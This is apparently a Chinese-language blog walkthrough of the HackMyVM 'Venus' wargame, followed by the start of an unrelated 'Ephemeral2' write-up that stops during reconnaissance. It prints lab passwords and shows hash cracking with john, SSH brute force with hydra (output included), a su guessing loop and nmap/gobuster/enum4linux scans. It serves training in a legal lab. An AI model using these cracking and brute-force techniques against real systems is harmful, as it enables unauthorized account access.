################

## EN ##
The user isla has left her password in a zip file.

## ES ##
La usuaria isla ha dejado su password en un fichero zip.

任务提示 isla的密码在压缩包里，但在当前主目录下是没有写入权限的，所以不能直接解压到当前目录，但 /tmp有写入权限

预期解应该是解压到/tmp目录下，然后读取

$ unzip passw0rd.zip -d /tmp
/tmp/pwned/victoria/passw0rd.txt   #读取获得密码
非预期：直接cat passw0rd.zip
PK
�.�T��B�wned/victoria/passw0rd.txtUT    �|Nb�|Nbux
                                                  D3XTob0FUImsoBb
PK
�.�T��B���pwned/victoria/passw0rd.txtUT�|Nbux
                                             PKae
同样可以得到密码

得到用户 isla的密码D3XTob0FUImsoBb，登陆在主目录下发下flag和下一个任务提示

Mission 0x10

################
# MISSION 0x10 #
################
## EN ##
The password of the user violet is in the line that begins with a9HFX (these 5 characters are not part of her password.). 
## ES ##
El password de la usuaria violet esta en la linea que empieza por a9HFX (sin ser estos 5 caracteres parte de su password.).

任务提示密码是以a9HFX开头，所以可以读取

$ grep ^a9HFX passy    或者     cat passy | grep "^a9HFX"
a9HFXWKINVzNQLKLDVAc

得到用户violet的密码WKINVzNQLKLDVAc，登录并转到主目录下发现flag 和下一个任务提示。

Mission 0x11

################
# MISSION 0x11 #
################

## EN ##
The password of the user lucy is in the line that ends with 0JuAZ (these last 5 characters are not part of her password) 

## ES ##
El password de la usuaria lucy se encuentra en la linea que acaba por 0JuAZ (sin ser estos ultimos 5 caracteres parte de su password)

任务提示密码是以0JuAZ结尾的，可以

$ cat end | grep "0JuAZ$"   或grep "0JuAZ$" end

得到用户lucy的密码OCmMUjebG53giud，登录转到主目录下获取flag和下一个任务提示。

Mission 0x12

################
# MISSION 0x12 #
################
## EN ##
The password of the user elena is between the characters fu and ck 
## ES ##
El password de la usuaria elena esta entre los caracteres fu y ck

任务提示，密码在 fu 和 ck 之间

$ cat file.yo | grep -E "^fu.*ck$"
fu4xZ5lIKYmfPLg9tck

elena的密码是4xZ5lIKYmfPLg9t

Misson 0x13

################
# MISSION 0x13 #
################

## EN ##
The user alice has her password is in an environment variable. 

## ES ##
La password de alice esta en una variable de entorno.

密码在环境变量里面，

$ env    或 printenv
...
USER=elena
PASS=Cgecy2MY2MWbaqt
SHLVL=3
...

得到用户 alice的密码Cgecy2MY2MWbaqt

Mission 0x14

################
# MISSION 0x14 #
################

## EN ##
The admin has left the password of the user anna as a comment in the file passwd. 

## ES ##
El admin ha dejado la password de anna como comentario en el fichero passwd.

用户anna的密码在/etc/passwd的注释里面

$ cat /etc/passwd | grep alice
alice:x:1014:1014:w8NvY27qkpdePox:/pwned/alice:/bin/bash

这是 Linux 系统中 /etc/passwd 文件中的一行记录，用于存储系统用户的基本信息。该记录的字段由冒号 : 分隔，各字段的含义如下：

alice：用户名，表示该用户的登录名。
x：加密密码，通常会在 /etc/shadow 文件中存储加密后的密码信息，因为密码需要保密，所以 /etc/passwd 文件中会使用一个占位符（通常是 x）来代替真正的密码。
1014：用户 ID（UID），表示该用户在系统中的唯一标识符。每个用户都有一个 UID，可以用于区分不同的用户。
1014：组 ID（GID），表示该用户所属的用户组在系统中的唯一标识符。每个用户都属于一个或多个用户组，可以用于实现文件、目录等资源的访问控制。
w8NvY27qkpdePox：用户信息，通常包括用户的全名、电话号码、地址等信息。
/pwned/alice：用户主目录，表示该用户的默认工作目录。在登录时，系统会自动切换到该目录。
/bin/bash：shell 程序路径，表示该用户默认的 shell 程序。在登录时，系统会启动该程序，为该用户提供基于命令行的交互式界面。

需要注意的是，上述记录中的各字段并没有固定的位置和数量，而是由各个 Linux 发行版和系统版本决定。但是，它们的含义通常是相同的，可以根据需要进行解析。

德奥用户 anna的密码是w8NvY27qkpdePox

Mission 0x15

################
# MISSION 0x15 #
################
## EN ##
Maybe sudo can help you to be natalia.
## ES ##
Puede que sudo te ayude para ser natalia.

任务提示 sudo

$ sudo -l
Matching Defaults entries for anna on venus:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User anna may run the following commands on venus:
    (natalia) NOPASSWD: /bin/bash

User anna may run the following commands on venus说明用户anna可以执行bash命令
(natalia) NOPASSWD: /bin/bash：用户natalia 在执行bash命令时无需密码

$ sudo -u natalia bash  跳转到natalia的bash,得到natalia的密码 NMuc4DkYKDsmZ5z

Tips：-u <用户>:以指定的用户作为新的身份。若不加上此参数，则预设以root作为新的身份；

Mission 0x16

################
# MISSION 0x16 #
################
## EN ##
The password of user eva is encoded in the base64.txt file
## ES ##
El password de eva esta encodeado en el fichero base64.txt

密码被base64加密了

$ cat base64.txt | base64 -d
upsCA3UFu10fDAO

得到 eva的密码 upsCA3UFu10fDAO

Mission 0x17

################
# MISSION 0x17 #
################

## EN ##
The password of the clara user is found in a file modified on May 1, 1968. 

## ES ##
La password de la usuaria clara se encuentra en un fichero modificado el 01 de Mayo de 1968.

任务提示最后被修改的时间，find命令有选项可以查看文件的相关时间，比如访问、修改等

$ $ find / -type f -mtime +19345 2>/dev/null   （2023-1970）*365=19345，时间戳最开始的时间是1970
/usr/lib/cmdo   # 查看即可得到 clara的密码  39YziWp5gSvgQN9

根据文件时间戳进行搜索

find . -type f 时间戳

Linux 每个文件都有三种时间戳

访问时间 （-atime/天，-amin/分钟）：用户最近一次访问时间。
修改时间 （-mtime/天，-mmin/分钟）：文件最后一次修改时间。
变化时间 （-ctime/天，-cmin/分钟）：文件数据元（例如权限等）最后一次修改时间。

举个栗子：

##搜索最近七天内被访问过的所有文件
$ find . -type f -atime -7
## 恰好七天
$ find . -type f -atime 7
##超过七天
$ find . -type f -atime +7

切换得到flag和下一个Mission

Mission 0x18

################
# MISSION 0x18 #
################

## EN ##
The password of user frida is in the password-protected zip (rockyou.txt can help you) 

## ES ##
La password de frida esta en el zip protegido con password.(rockyou.txt puede ayudarte)

任务提示 frida的密码在被加密的压缩包里面，需要爆破

$ scp -P 5000 clara@venus.hackmyvm.eu:~/protected.zip .   // 把压缩包down到本地
$ zip2john protected.zip > Hash
$ john --wordlist=/home/kali/rockyou.txt Hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass123          (protected.zip/pwned/clara/protected.txt)     
1g 0:00:00:00 DONE (2023-06-02 21:17) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
#得到密码解压得到 frida的密码 Ed4ErEUJEaMcXli

Mission 0x19

################
# MISSION 0x19 #
################

## EN ##
The password of eliza is the only string that is repeated (unsorted) in repeated.txt. 

## ES ##
La password de eliza es el unico string que se repite (sin estar ordenado) en repeated.txt.

任务提示 eliza的密码是唯一重复的字符串

$ uniq -d repeated.txt
Fg6b6aoksceQqB9

得到 eliza的密码 Fg6b6aoksceQqB9

Mission 0x20

################
# MISSION 0x20 #
################

## EN ##
The user iris has left me her key.

## ES ##
La usuaria iris me ha dejado su key.

任务提示 iris的key被当前用户知道了。

$ find / -name "*iris*" -exec ls -l {} \; 2>/dev/null    #查看与iris相关的问价，发现了 .iris_key,很显然是ssh私钥
直接连接
$ ssh -i  .iris_key iris@localhost
连接成功，并且得到 iris 的密码 kYjyoLcnBZ9EJdz

Mission 0x21

################
# MISSION 0x21 #
################
## EN ##
User eloise has saved her password in a particular way. 
## ES ##
La usuaria eloise ha guardado su password de una forma particular.

一眼 Base64转图片（可以搜在线工具，也有很多离线工具）

$ scp -P 5000 iris@venus.hackmyvm.eu:~/eloise ./

base64解码保存为 .jpg ,得到 eloise的密码 yOUJlV0SHOnbSPm

Mission 0x22

################
# MISSION 0x22 #
################

## EN ##
User lucia has been creative in saving her password.

## ES ##
La usuaria lucia ha sido creativa en la forma de guardar su password.

根据提示可以得到，密码被某种方式编码了，CyberChef 一把嗦，可知是 hexdump

$ xxd -r hi
uvMwFDQrQWPMeGP   # 得到lucia的密码

Mission 0x23

################
# MISSION 0x23 #
################

## EN ##
The user isabel has left her password in a file in the /etc/xdg folder but she does not remember the name, however she has dict.txt that can help her to remember.

## ES ##
La usuaria isabel ha dejado su password en un fichero en la carpeta /etc/xdg pero no recuerda el nombre, sin embargo tiene dict.txt que puede ayudarle a recordar.

任务提示，密码文件在/etc/xdg文件夹下，但是我们没有权限全列出（ls）其下的文件列表，但提供了一个文件dict.txt，所以就只能爆破了。

$ stat /etc/xdg       // 查看一下文件夹权限
  File: /etc/xdg
  Size: 4096            Blocks: 8          IO Block: 4096   directory
Device: 28h/40d Inode: 272791      Links: 3
Access: (0661/drw-rw---x)  Uid: (    0/    root)   Gid: (    0/    root)

$ while IFS= read -r line; do readlink -e /etc/xdg/$line ; done < dict.txt
/etc/xdg
/etc/xdg/readme
$ cat /etc/xdg/readme
H5ol8Z2mrRsorC0     // 得到isabel的密码 H5ol8Z2mrRsorC0

dict.txt中有一个隐藏的的Flag

标准格式

IFS=
while read -r line
do
 readlink -e "/etc/xdg/$line"
done < dict.txt

脚本细究
- IFS= 是 Shell 脚本中的一种特殊变量，表示输入字段分隔符。当 IFS 变量为空时，Shell 将默认使用空格、制表符和换行符作为输入字段分隔符。也就是说，设置 IFS= 后，Shell 会将需要读取的内容以整行为单位读入。（目的是为了处理文件中包含特殊字符或空格的情况，但我测试的短文本加不加好像都一样）
- 该脚本首先将 dict.txt 文件通过输入重定向 < 输入到循环中，然后逐行读取 dict.txt 中的记录，并将每一行的内容赋值给循环变量 $line。

然后，脚本使用 readlink 命令来输出指定文件的符号链接或子目录内容。其中 -e 选项表示展开符号链接，并将链接转换为其所指向的真实文件路径。命令中的 /etc/xdg/$line 表示由 /etc/xdg/ 目录和当前循环变量 $line 组成的文件路径，用于确定需要获取符号链接的目标文件。

因此，整个脚本的作用是：逐行读取 dict.txt 文件中的内容，将每一行内容作为文件名参数传递给 readlink 命令，并输出符号链接对应的真实文件路径或子目录内容。该脚本可以用于查找指定目录下的文件或目录的符号链接，并输出它们所指向的真实路径或内容。

Mission 0x24

################
# MISSION 0x24 #
################

## EN ##
The password of the user freya is the only string that is not repeated in different.txt 

## ES ##
La password de la usuaria freya es el unico string que no se repite en different.txt

任务提示：freya的密码是唯一一个没有重复的字符串（和Mission 0x19 恰恰相反）

$ uniq -u differnt.txt
EEDyYFDwYsmYawj   //得到freya的密码 EEDyYFDwYsmYawj

Mission 0x25

################
# MISSION 0x25 #
################
## EN ##
User alexa puts her password in a .txt file in /free every minute and then deletes it. 
## ES ##
La usuaria alexa pone su password en un fichero .txt en la carpeta /free cada minuto y luego lo borra.

任务提示密码在 /free文件夹下，但每分钟都会被删除，想要手动打开的可能性应该不大，所以可以用脚本来实现

$ false; while [ $? -ne 0 ]; do cat /free/* ; done 2>/dev/null
mxq9O3MSxxX9Q3S   # 得到alexa的密码 mxq9O3MSxxX9Q3S

等价于：

while true; do
cat /free/* 2>/dev/null
if [ $? -eq 0 ]; then
  break
fi
done

Tips: Linux系统中 True 是 0；false 是 1；如果上一条命令执行失败，$?就等于 1（false）

Mission 0x26

################
# MISSION 0x26 #
################

## EN ##
The password of the user ariel is online! (HTTP)

## ES ##
El password de la usuaria ariel esta online! (HTTP)

密码是在线的

$ curl http://localhost
33EtHoz9a0w2Yqo   #得到ariel的密码 33EtHoz9a0w2Yqo

Mission 0x27

################
# MISSION 0x27 #
################

## EN ##
Seems that ariel don't save the password for lola, but there is a temporal file.

## ES ##
Parece ser que a ariel no le dio tiempo a guardar la password de lola... menosmal que hay un temporal!

任务提示没保存 lola 的密码。

$ ls -a
.  ..  .bash_logout  .bashrc  .goas.swp  .profile  flagz.txt  mission.txt
$ vim -r .goas.swp
   ...  删除掉 -->
:w /tmp/jzcheng.txt
:q!           # 将文件另存到 /tmp/jzcheng.txt 并退出
$ while IFS= read -r passwd;do echo $passwd | timeout 2 su lola 2>/dev/null;if [ $? -eq 0 ];then echo $passwd;break;fi;done < /tmp/jzcheng.txt
d3LieOzRGX5wud6
// 得到 lola 的密码 d3LieOzRGX5wud6
或者使用 hydra
$ hydra -l lola -P /tmp/jzcheng.txt ssh://venus.hackmyvm.eu:5000

Mission 0x28

################
# MISSION 0x28 #
################
## EN ##
The user celeste has left a list of names of possible .html pages where to find her password. 
## ES ##
La usuaria celeste ha dejado un listado de nombres de posibles paginas .html donde encontrar su password.

任务提示，密码藏在 html 的网页里面

创建一个 SSH 隧道（tunnel），将远程服务器 venus.hackmyvm.eu 上的 80 端口转发到本地计算机的 9001 端口。
$ ssh -L 9001:127.0.0.1:80 lola@venus.hackmyvm.eu -p 5000
然后再扫描目录
$ dirb http://127.0.0.1:9001/ ./pages.txt -X .html
或者 gobuster dir -w pages.txt -u http://127.0.0.1:9001 -x html
可以得到一个网页
http://127.0.0.1:9001/cebolla.html
$ curl http://127.0.0.1:9001/cebolla.html
VLSNMTKwSV2o8Tn   //得到了 celeste 的密码 VLSNMTKwSV2o8Tn

非预期 find / -name "*.html" -path '/var/www*' 2>/dev/null

Mission 0x29

################
# MISSION 0x29 #
################

## EN ##
The user celeste has access to mysql but for what?

## ES ##
La usuaria celeste tiene acceso al mysql, pero para que?

任务提示，数据库中存在着些什么

$ mysql -uceleste -pVLSNMTKwSV2o8Tn   //登录Mysql数据库
> show databases;
> use venus;
> show tables;
> select * from people where length(pazz)=15;        //根据之前的密码长度来做个过滤
+-----------+----------+-----------------+
| id_people | uzer     | pazz            |
+-----------+----------+-----------------+
|        16 | sfdfdsml | ixpeqdsfsdfdsfW |
|        44 | yuio     | ixpgbvcbvcbeqdW |
|        54 | crom     | ixpefdbvvcbrqdW |
|        58 | bael     | ixpesdvsdvsdqdW |
|        74 | nina     | ixpeqdWuvC5N9kG |
|        77 | dsar     | ixpeF43F3F34qdW |
|        78 | yop      | ixpeqdWCSDFDSFD |
|        79 | loco     | ixpeF43F34F3qdW |
+-----------+----------+-----------------+

发现在 pwned目录下发现用户名 nina，因此可以得到 nina的密码 ixpeqdWuvC5N9kG

在数据库中还存在一个Hidden Flag； select * from people;

Mission 0x30

################
# MISSION 0x30 #
################

## EN ##
The user kira is hidding something in http://localhost/method.php

## ES ##
La usuaria kira esconde algo en http://localhost/method.php

任务提示，通过某种请求方法

$ curl -XGET http://localhost/method.php
I dont like this method!
$ curl -XPUT http://localhost/method.php
tPlqxSKuT4eP3yr   //得到 kira的密码 tPlqxSKuT4eP3yr

Mission 0x31

################
# MISSION 31 #
################

## EN ##
The user veronica visits a lot http://localhost/waiting.php

## ES ##
La usuaria veronica visita mucho http://localhost/waiting.php

任务提示

$ curl http://localhost/waiting.php
Im waiting for the user-agent PARADISE.   
使用 -A 选项来修改 user-agent 的值
$ curl -A PARADISE http://localhost/waiting.php
QTOel6BodTx2cwX   // 获得到 veronica的密码 QTOel6BodTx2cwX

Mission 0x32

################
# MISSION 0x32 #
################

## EN ##
The user veronica uses a lot the password from lana, so she created an alias.

## ES ##
La usuaria veronica usa mucho la password de lana, asi que ha creado un alias.

任务提示，lana的密码被设置成了别名

$ alias   
alias lanapass='UWbc0zNEVVops1v'   // 得到lana的密码 UWbc0zNEVVops1v

Mission 0x33

################
# MISSION 0x33 #
################

## EN ##
The user noa loves to compress her things.

## ES ##
A la usuaria noa le gusta comprimir sus cosas.

密码在压缩包里面

$ mkdir /tmp/jzcheng;
$ tar -xvf zip.gz -C /tmp/jzcheng 
$ cat ...           // 得到 noa 的密码 9WWOPoeJrq6ncvJ
> 非预期
$ cat zip.gz 
pwned/lana/zip0000644000000000000000000000002014223477016012327 0ustar  rootroot9WWOPoeJrq6ncvJ

Mission 0x34

################
# MISSION 0x34 #
################

## EN ##
The password of maia is surrounded by trash 

## ES ##
La password de maia esta rodeada de basura

任务提示密码在 trash 中

$ string trash
h1hnDPHpydEjoEN  //得到maia 的密码 h1hnDPHpydEjoEN

Mission 0x35

################
# MISSION 0x35 #
################

## EN ##
The user gloria has forgotten the last 2 characters of her password ... They only remember that they were 2 lowercase letters. 

## ES ##
La usuaria gloria ha olvidado los 2 ultimos caracteres de su password... Solo recuerdan que eran 2 letras minusculas.

任务提示密码的后两位是小写字母，

from string import ascii_lowercase
f = open('pazz.txt', 'w+')
for i in ascii_lowercase:
    for j in ascii_lowercase:
        print(f"v7xUVE2e5bjUc{i}{j}", file=f)

hydra 超慢

$hydra -l gloria -P pazz.txt ssh://venus.hackmyvm.eu:5000
$ hydra -l gloria -P pazz.txt  -f venus.hackmyvm.eu -s 5000 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-10 00:36:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 676 login tries (l:1/p:676), ~43 tries per task
[DATA] attacking ssh://venus.hackmyvm.eu:5000/
[STATUS] 101.00 tries/min, 101 tries in 00:01h, 580 to do in 00:06h, 16 active
[STATUS] 89.00 tries/min, 267 tries in 00:03h, 414 to do in 00:05h, 16 active
[STATUS] 83.71 tries/min, 586 tries in 00:07h, 99 to do in 00:02h, 16 active
[5000][ssh] host: venus.hackmyvm.eu   login: gloria   password: v7xUVE2e5bjUcxw
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 14 final worker threads did not complete until end.
[ERROR] 14 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-10 00:43:55

获得 gloria的密码 v7xUVE2e5bjUcxw

Mission 0x36

################
# MISSION 0x36 #
################

## EN ##
User alora likes drawings, that's why she saved her password as ... 

## ES ##
A la usuaria alora le gustan los dibujos, por eso ha guardado su password como...

任务提示在密码在image文件中，cat查看一下像二维码，缩小，扫码得到alora的密码mhrTFCoxGoqUxtw

image-20230614104921199

Mission 0x37

################
# MISSION 0x37 #
################

## EN ##
User Julie has created an iso with her password.

## ES ##
La usuaria julie ha creado una iso con su password.

密码在 iso 镜像文件里

非预期直接 cat 查看

$ mkdir /tmp/music
$ sudo mount -o loop music.iso /tmp/music   //挂载到本地虚拟机
$ unzip /tmp/music/music.zip -d tmp
$ cat /tmp/pwned/a;ora/music.txt
sjDf4i2MSNgSvOv            -- 得到julie的密码 sjDf4i2MSNgSvOv

这个命令的作用是将 music.iso 挂载到 /tmp/music/ 目录下。具体来说，mount 命令是用于挂载文件系统， -o loop 参数告诉它把文件作为循环设备（loop device）挂载，music.iso 则是要挂载的 ISO 镜像文件，最后的 /tmp/music/ 是指挂载点（mount point），即将镜像文件挂载到哪个目录下面。执行这条命令后，在 /tmp/music/ 目录下就可以访问 music.iso 镜像中的文件了。

Mission 0x38

################
# MISSION 0x38 #
################

## EN ##
The user irene believes that the beauty is in the difference.

## ES ##
La usuaria irene cree que en la diferencia esta lo bonito.

根据任务提示可以知道，密码应该是两个文件的差异部分

$ diff 1.txt 2.txt
174c174
< 8VeRLEFkBpe2DSD
---
> aNHRdohjOiNizlU

经过尝试得到 irene的密码8VeRLEFkBpe2DSD

Mission 0x39

################
# MISSION 0x39 #
################

## EN ##
The user adela has lent her password to irene.

## ES ##
La usuaria adela le ha dejado prestada su password a irene.

查看有三个文件 id_rsa.pem、id_rsa.pub、pass.enc

id_rsa.pem：一个私钥文件，可能用于 SSH 认证等操作。通常情况下，私钥文件需要严格保密。
id_rsa.pub：与 id_rsa.pem 配对的公钥文件，可用于验证使用相应私钥签名的数据或者对数据进行加密。
pass.enc：一个加密文件，可能包含密码、私钥或其他敏感信息。该文件使用某种加密算法进行了加密处理，需要使用正确的秘钥或密码进行解密才能读取其中的内容。

$ openssl rsautl -decrypt -inkey id_rsa.pem -in pass.enc
nbhlQyKuaXGojHx    --得到 adela的密码 nbhlQyKuaXGojHx

openssl rsautl 是 OpenSSL 命令行工具中使用 RSA 算法进行加解密操作的命令

-decrypt选项是解密

-inkey id_rsa.pem 表示指定使用 id_rsa.pem 文件中的私钥进行解密操作

-in pass.enc 表示要解密的输入文件是 pass.enc.

Mission 0x40

################
# MISSION 0x40 #
################

## EN ##
User sky has saved her password to something that can be listened to.

## ES ##
La usuaria sky ha guardado su password en algo que puede ser escuchado.

文件wtf的内容被莫斯电码加密了

.--. .- .--. .- .--. .- .-. .- -.. .. ... .
解密 PAPAPARADISE （要转换成小写papaparadise就是sky的密码）

Mission 0x41

################
# MISSION 0x41 #
################

## EN ##
User sarah uses header in http://localhost/key.php

## ES ##
La usuaria sarah utiliza header para http://localhost/key.php

密码在网页 key.php里面

$ curl http://localhost/key.php
Key header is true?
$ curl -H "key:true" http://localhost/key.php
LWOHeRgmIxg7fuS       -- 得到 sarah的密码 LWOHeRgmIxg7fuS

Mission 0x42

################
# MISSION 0x42 #
################

## EN ##
The password of mercy is hidden in this directory.

## ES ##
La password de mercy esta oculta en este directorio.

密码文件隐藏在当前目录下

$ ls -a  发现可疑文件 ...
$ cat ./...
ym5yyXZ163uIS8L       --得到mercy的密码 ym5yyXZ163uIS8L

Mission 0x43

################
# MISSION 0x43 #
################

## EN ##
User mercy is always wrong with the password of paula. 

## ES ##
La usuaria mercy siempre se equivoca con la password de paula.

查看 mercy 的历史指令

$ cat .bash_history
得到 paula的密码 dlHZ6cvX6cLuL8p

Mission 0x44

################
# MISSION 0x44 #
################

## EN ##
The user karla trusts me, she is part of my group of friends. 

## ES ##
La usuaria karla confia en mi, es parte de mi grupo de amigos.

查看 karla的组

$ id
uid=1044(paula) gid=1044(paula) groups=1044(paula),1053(hidden)   --hidden组
$ find / -group hidden -type f -exec cat {} \; 2>/dev/null
gYAmvWY3I7yDKRf     -- 得到karla的密码

Mission 0x45

################
# MISSION 0x45 #
################

## EN ##
User denise has saved her password in the image.

## ES ##
La usuaria denise ha guardado su password en la imagen.

密码隐藏在图片里

$ exiftool yuju.jpg
About  : pFg92DpGucMWccA  -- 得到denise的密码 pFg92DpGucMWccA

Mission 0x46

################
# MISSION 0x46 #
################

## EN ##
The user zora is screaming doas!

## ES ##
La usuaria zora no deja de gritar doas!

通过搜索可以知道 Doas是一个开源软件，简化的Unix命令授权系统

$ find / -name doas 2>/dev/null
/usr/share/lintian/overrides/doas
/usr/share/doc/doas
/usr/bin/doas
/etc/pam.d/doas

有一个可执行的二进制文件 doas -u zora bash后输入denise的密码 pFg92DpGucMWccA

成功登录到 zora的 shell，得到其密码 BWm1R3jCcb53riO

Mission 0x47

################
# MISSION 0x47 #
################

## EN ##
The user belen has left her password in venus.hmv

## ES ##
La usuaria belen ha dejado su password en venus.hmv

密码在网页venus.hmv

$ curl venus.hmv
得到用户belen的密码2jA0E8bQ4WrGwWZ

Misson 0x48

################
# MISSION 0x48 #
################

## EN ##
It seems that belen has stolen the password of the user leona...

## ES ##
Parece que belen ha robado el password de la usuaria leona..

密码在 stolen.txt

$ cat stolen.txt
$1$leona$lhWp56YnWAMz6z32Bw53L0
$ hashid '$1$leona$lhWp56YnWAMz6z32Bw53L0'
Analyzing '$1$leona$lhWp56YnWAMz6z32Bw53L0'
[+] MD5 Crypt 
[+] Cisco-IOS(MD5) 
[+] FreeBSD MD5   //是哈希MD5
使用john爆破
$ echo '$1$leona$lhWp56YnWAMz6z32Bw53L0'>hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
得到 leona的密码 freedom

Mission 0x49

################
# MISSION 0x49 #
################

## EN ##
User ava plays a lot with the DNS of venus.hmv lately... 

## ES ##
La usuaria ava juega mucho con el DNS de venus.hmv ultimamente...

与DNS记录有关

nslook和dig都没发现有用的详细
$ ls /etc/bind
$ cat /etc/bind/db.venus.hmv 
在TXT记录里面发现 ava的密码 oCXBeeEeYFX34NU

Mission 0x50

################
# MISSION 0x50 #
################

## EN ##
The password of maria is somewhere...

## ES ##
El password de maria esta en algun lugar...

试了好半天，万万没想到maria的密码是 .--. .- .--. .- .--. .- .-. .- -.. .. ... .

Last Mission

################
# MISSION 0x51 #
################

## EN ##
Congrats!

## ES ##
Felicidades :)

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvlabs/venus/

HMV-Ephemeral2

呼啸山庄 — Wed, 14 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(web)─(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"                 
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
192.168.0.102   08:00:27:47:7c:83

nmap指纹

┌──(web)─(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.102
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-13 11:01 EST
Nmap scan report for 192.168.0.102
Host is up (0.00069s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0a:cc:f1:53:7e:6b:31:2c:10:1e:6d:bc:01:b1:c3:a2 (RSA)
|   256 cd:19:04:a0:d1:8a:8b:3d:3e:17:ee:21:5d:cd:6e:49 (ECDSA)
|_  256 e5:6a:27:39:ed:a8:c9:03:46:f2:a5:8c:87:85:44:9e (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: 10s
| smb2-time: 
|   date: 2026-01-13T16:01:54
|_  start_date: N/A
|_nbstat: NetBIOS name: EPHEMERAL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.31 seconds

目录扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# dirsearch -u http://192.168.0.102

  _|. _ _  _  _  _ _|_    v0.4.3.post1               
 (_||| _) (/_(_|| (_| )                              
                                                     
Extensions: php, aspx, jsp, html, js
HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.0.102/_26-01-13_11-05-02.txt

Target: http://192.168.0.102/

[11:05:03] Starting:                                 
[11:05:04] 403 -  278B  - /.ht_wsr.txt
[11:05:04] 403 -  278B  - /.htaccess.bak1
[11:05:04] 403 -  278B  - /.htaccess.orig
[11:05:04] 403 -  278B  - /.htaccess_extra
[11:05:04] 403 -  278B  - /.htaccess_sc
[11:05:04] 403 -  278B  - /.htaccessOLD
[11:05:04] 403 -  278B  - /.html
[11:05:04] 403 -  278B  - /.htm
[11:05:04] 403 -  278B  - /.htaccess.sample
[11:05:04] 403 -  278B  - /.httr-oauth
[11:05:04] 403 -  278B  - /.htpasswd_test
[11:05:04] 403 -  278B  - /.htaccess_orig
[11:05:04] 403 -  278B  - /.htaccessOLD2
[11:05:04] 403 -  278B  - /.htaccess.save
[11:05:04] 403 -  278B  - /.htpasswds
[11:05:04] 403 -  278B  - /.htaccessBAK
[11:05:42] 301 -  319B  - /javascript  ->  http://192.168.0.102/javascript/
[11:06:04] 403 -  278B  - /server-status
[11:06:04] 403 -  278B  - /server-status/

Task Completed

┌──(web)─(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.0.102 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.102
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,zip,db,bak,js,yaml
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 10918]
/javascript           (Status: 301) [Size: 319] [--> http://192.168.0.102/javascript/]                    
/.html                (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
/foodservice          (Status: 301) [Size: 320] [--> http://192.168.0.102/foodservice/]                   
Progress: 1985031 / 1985040 (100.00%)
===============================================================
Finished
===============================================================

enum4linux扫描

──(web)─(root㉿kali)-[/home/kali]
└─# enum4linux 192.168.0.102           

Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jan 13 11:21:36 2026

 =========================================( Target Information )========================================= 
                                                     
Target ........... 192.168.0.102                     
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.0.102 )===========================  
                                                     
                                                     
[+] Got domain/workgroup name: WORKGROUP             
                                                     
                                                     
 ===============================( Nbtstat Information for 192.168.0.102 )===============================  
                                                     
Looking up status of 192.168.0.102                   
        EPHEMERAL       <00> -         B <ACTIVE>  Workstation Service
        EPHEMERAL       <03> -         B <ACTIVE>  Messenger Service
        EPHEMERAL       <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
